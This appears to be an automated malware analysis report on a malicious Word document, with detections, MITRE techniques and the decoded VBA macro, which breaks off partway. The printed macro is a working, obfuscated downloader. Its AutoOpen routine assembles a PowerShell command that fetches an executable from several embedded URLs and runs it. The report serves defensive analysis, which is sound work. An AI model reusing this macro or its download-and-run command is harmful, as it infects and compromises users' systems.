Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Microsoft Word document containing a VBA macro. The AutoOpen macro is designed to execute a command using Shell, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Downloader.Emooodldr-6689976-0' further supports its role as a downloader.
Heuristics (5)

- ClamAV: Doc.Downloader.Emooodldr-6689976-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emooodldr-6689976-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4534 bytes |

SHA-256: b8c196fc71fd8fc01ffef2ad49a4c904d079c45c228ca8da49165ff6bc337189

Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "DBKDWFuIhNwzVw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const vjKOKlU = 0
Dim driCYS(2)
driCYS(0) = Right(JVFjZ, 862)
driCYS(1) = MidB(ZojZHrv, 809, 684)
Dim MIbjca(3)
MIbjca(0) = Right(JVFjZ, 862)
MIbjca(1) = Mid(EOqjzdt, 323, 516)
MIbjca(2) = Right(JVFjZ, 862)
Dim ILVJd(5)
ILVJd(0) = Right(JVFjZ, 862)
ILVJd(1) = MidB(ZojZHrv, 809, 684)
ILVJd(2) = Left(Xdurj, 100)
ILVJd(3) = Mid(EOqjzdt, 323, 516)
ILVJd(4) = Left(Xdurj, 100)
Dim huziw(4)
huziw(0) = Left(Xdurj, 100)
huziw(1) = MidB(ZojZHrv, 809, 684)
huziw(2) = Left(Xdurj, 100)
huziw(3) = MidB(ZojZHrv, 809, 684)
Dim Mnfjzi(5)
Mnfjzi(0) = Left(Xdurj, 100)
Mnfjzi(1) = Right(JVFjZ, 862)
Mnfjzi(2) = MidB(ZojZHrv, 809, 684)
Mnfjzi(3) = Right(JVFjZ, 862)
Mnfjzi(4) = Left(Xdurj, 100)
Shell@ SdYTp + aTlfHVjQIvf + zXOhiibnrP, CInt(vjKOKlU)
Dim RLtFPZ(4)
RLtFPZ(0) = Left(Xdurj, 100)
RLtFPZ(1) = Left(Xdurj, 100)
RLtFPZ(2) = Right(JVFjZ, 862)
RLtFPZ(3) = MidB(ZojZHrv, 809, 684)
Dim CAYIzk(4)
CAYIzk(0) = MidB(ZojZHrv, 809, 684)
CAYIzk(1) = Mid(EOqjzdt, 323, 516)
CAYIzk(2) = Left(Xdurj, 100)
CAYIzk(3) = Mid(EOqjzdt, 323, 516)
End Sub
Attribute VB_Name = "HJXWrpqHU"
Function SdYTp()
Dim FXnVM(3)
FXnVM(0) = Mid(EOqjzdt, 323, 516)
FXnVM(1) = MidB(ZojZHrv, 809, 684)
FXnVM(2) = Right(JVFjZ, 862)
Dim kiDRl(3)
kiDRl(0) = Left(Xdurj, 100)
kiDRl(1) = Left(Xdurj, 100)
kiDRl(2) = Mid(EOqjzdt, 323, 516)
qoUEHwZz = Format(Chr(3 + 9 + 3 + 0 + 84)) + "md /V^:ON/" + Format(Chr(2 + 6 + 2 + 0 + 57)) + Format(Chr(1 + 3 + 1 + 0 + 29)) + "^se^t ^Ke= ^" + " ^ ^ ^ ^ ^ ^ }" + "^}{h" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ta" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "};^kaer^b^;zkw$ ^" + "m^e^tI^-^e^kovn^I;" + ")zk^w^$ ,^Z^UV$(^eliFdao" + "^ln^woD^.a^z^l${" + "^yrt{)j^FV$" + "^ ni ZUV$(^h"
Dim GJIzU(3)
GJIzU(0) = Right(JVFjZ, 862)
GJIzU(1) = Left(Xdurj, 100)
GJIzU(2) = Right(JVFjZ, 862)
Dim YYIwF(4)
YYIwF(0) = Right(JVFjZ, 862)
YYIwF(1) = Left(Xdurj, 100)
YYIwF(2) = Mid(EOqjzdt, 323, 516)
YYIwF(3) = MidB(ZojZHrv, 809, 684)
Dim VPsSo(3)
VPsSo(0) = Left(Xdurj, 100)
VPsSo(1) = MidB(ZojZHrv, 809, 684)
VPsSo(2) = Right(JVFjZ, 862)
bYUpXlw = Format(Chr(3 + 9 + 3 + 0 + 84)) + "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ q^pv$;)'^@" + "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + "Q/^eg.^ana^h^s^o^h^s//^:p" + "^t^t^h@0gE4^6U^9^lN/ri^." + "^ap^sdn^al//^:ptt^h@" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "wE" + "/^s^e^.^la^t^i^pa" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^a^dno//^:" + "^ptth^@^8^b^p" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" + Format(Chr(3 + 9 + 3 + 0 + 84)) + ".se" + "^ige^tarts^dni^mnir"
Dim TmMLp(5)
TmMLp(0) = Mid(EOqjzdt, 323, 516)
TmMLp(1) = Left(Xdurj, 100)
TmMLp(2) = Left(Xdurj, 100)
TmMLp(3) = MidB(ZojZHrv, 809, 684)
TmMLp(4) = Left(Xdurj, 100)
Dim FrnWaj(3)
FrnWaj(0) = Left(Xdurj, 100)
FrnWaj(1) = Left(Xdurj, 100)
FrnWaj(2) = Right(JVFjZ, 862)
WzHqWJWbBXQ = "a^e^b//^:^pt^th^@^LIN^" + "M^Y^in^hz/" + "gr^o.re^t" + "r^o^pb^a//:^pt^th'" + "=^jFV^$^;^tn^eil" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "b^eW.^teN" + " t" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^e^jb^o-^w^e" + "n^=azl^$ ^lleh^srewop&&^f" + "or /^L %^D ^in (3^6^7;^-1" + "^;^0)^d^o s^e^t ^" + "if=!^if!!^Ke" + ":~%^D,1!&&i^f" + " %^D ^l^ss ^1 " + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^" + "a^l^l %^if:^*^if^!="
Dim LWJFWj(4)
LWJFWj(0) = Left(Xdurj, 100)
LWJFWj(1) = Right(JVFjZ, 862)
LWJFWj(2) = MidB(ZojZHrv, 809, 684)
LWJFWj(3) = Mid(EOqjzdt, 323, 516)
Dim bwuVfz(2)
bwuVfz(0) = Right(JVFjZ, 862)
bwuVfz(1) = Right(JVFjZ, 862)
Dim zbYtJ(4)
zbYtJ(0) = Left(Xdurj, 100)
zbYtJ(1) = MidB(ZojZHrv, 809, 684)
zbYtJ(2) = Right(JVFjZ, 862)
zbYtJ(3) = Mid(EOqjzdt, 323, 516)
Dim vsQWWO(3)
vsQWWO(0)
```

... (truncated)